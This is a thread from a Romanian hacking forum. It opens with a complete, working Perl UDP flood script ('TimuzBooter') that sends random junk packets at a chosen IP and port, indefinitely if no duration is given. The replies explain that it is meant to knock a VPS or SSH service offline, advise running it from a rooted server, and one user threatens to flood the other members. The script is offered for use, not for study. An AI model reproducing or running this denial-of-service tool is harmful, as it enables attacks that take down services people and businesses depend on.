Romania- Posted August 9, 2014 Report Posted August 9, 2014 #!/usr/bin/perl START SCRIPTuse Socket;use strict;if ($#ARGV != 3) { print "Use TimuzBooter like this! <ip> <port> <size> <time>\n\n"; print " port=0: use random ports\n"; print " size=0: use random size between 64 and 1024\n"; print " time=0: UNLIMITED FLOOD, stop with CTRL+C\n"; exit(1);}my ($ip,$port,$size,$time) = @ARGV;my ($iaddr,$endtime,$psize,$pport);$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";$endtime = time() + ($time ? $time : 1000000);socket(flood, PF_INET, SOCK_DGRAM, 17);print "Timuz is now flooding $ip " . ($port ? $port : "random") . " port with " . ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n";print "Break with Ctrl-C\n" unless $time;for (;time() <= $endtime;) { $psize = $size ? $size : int(rand(1024-64)+64) ; $pport = $port ? $port : int(rand(65500))+1; send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepRAfAS2c6CHAyegURepUbre94w?RAwruS2uhU8UXasp7spasw7sw8h7wapr5spabekumu8ast8StRadusASacu6a6e5efrAzeWucH5cumus?waraca7hAbrewrecujetrafefadrawruW4ayAjU37sPUseBr4cRuPhacrUtrf0azrrQlLd1xdSjjtdwX?fjyXArkExrVxVlulxssmr0u0lRscLAqjkZB43ajPRmAH4JQ6T1SOZPFmndbEi4IUOIuUmPCXI044f73u?GIeJHs8lh36KpJausXqykL2idPx1j120Rra2DI1kmGgde5LI4TJMuQvrotBR3Fli0g1uwt74ALKfRzHY?ZJR0wkqNncUY178LcbTFtx5n7MF4zX3P4Z3mUVkAebkXqDv6EETKTNBes9kW2QBEBLeKcBH4cUAQ8Y30?mdGozVRNJq3wtDMmgtzCibqXEEp3cZATTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVm?fNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEva?cu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruN?uTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5?asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4th?a922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3?phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afa"), 0, pack_sockaddr_in($pport, $iaddr));}#!/usr/bin/perl END SCRIPT Source: http://www.hackforums.net/showthread.php?tid=4080989 Quote
blech Posted August 9, 2014 Report Posted August 9, 2014 ce face mai exact asta? ce reprezinta stringurile alea pe care le trimite? Quote
Romania- Posted August 9, 2014 Author Report Posted August 9, 2014 ce face mai exact asta? ce reprezinta stringurile alea pe care le trimite?Trimite pachete de flood in un vps , cand te loghezi cu putty o sa-ti zica ca nu se poate conecta la acel ip. Quote
.Breacker Posted August 9, 2014 Report Posted August 9, 2014 Trimite pachete de flood in un vps , cand te loghezi cu putty o sa-ti zica ca nu se poate conecta la acel ip."in un vps" ? Ce înseamn?? Noi nu ?tie vorbe?te române?te.Exist? n-uri ddos perl dac? cau?i. Quote
blech Posted August 9, 2014 Report Posted August 9, 2014 sa mor daca am inteles totusi care este scopul....dai ddos la ce.... la serviciul de ssh? ca sa nu mai pot intra cu ssh pe un server? Quote
Romania- Posted August 9, 2014 Author Report Posted August 9, 2014 sa mor daca am inteles totusi care este scopul....dai ddos la ce.... la serviciul de ssh? ca sa nu mai pot intra cu ssh pe un server?Da , exact asa face. Quote
.Breacker Posted August 9, 2014 Report Posted August 9, 2014 sa mor daca am inteles totusi care este scopul....dai ddos la ce.... la serviciul de ssh? ca sa nu mai pot intra cu ssh pe un server?Te conectezi la un server SSH cu acces root ?i rulezi acel script pentru a da un atac DDoS. Quote
Castiel Posted August 9, 2014 Report Posted August 9, 2014 (edited) // Edited August 9, 2014 by Castiel Quote
blech Posted August 9, 2014 Report Posted August 9, 2014 ddos zici? primul "d" din acronim vine de la distributed... Quote
Open Posted August 9, 2014 Report Posted August 9, 2014 Acum ca am pus mana pe scriptu asta, va dau flood la toti sa moara mama!!!!! Quote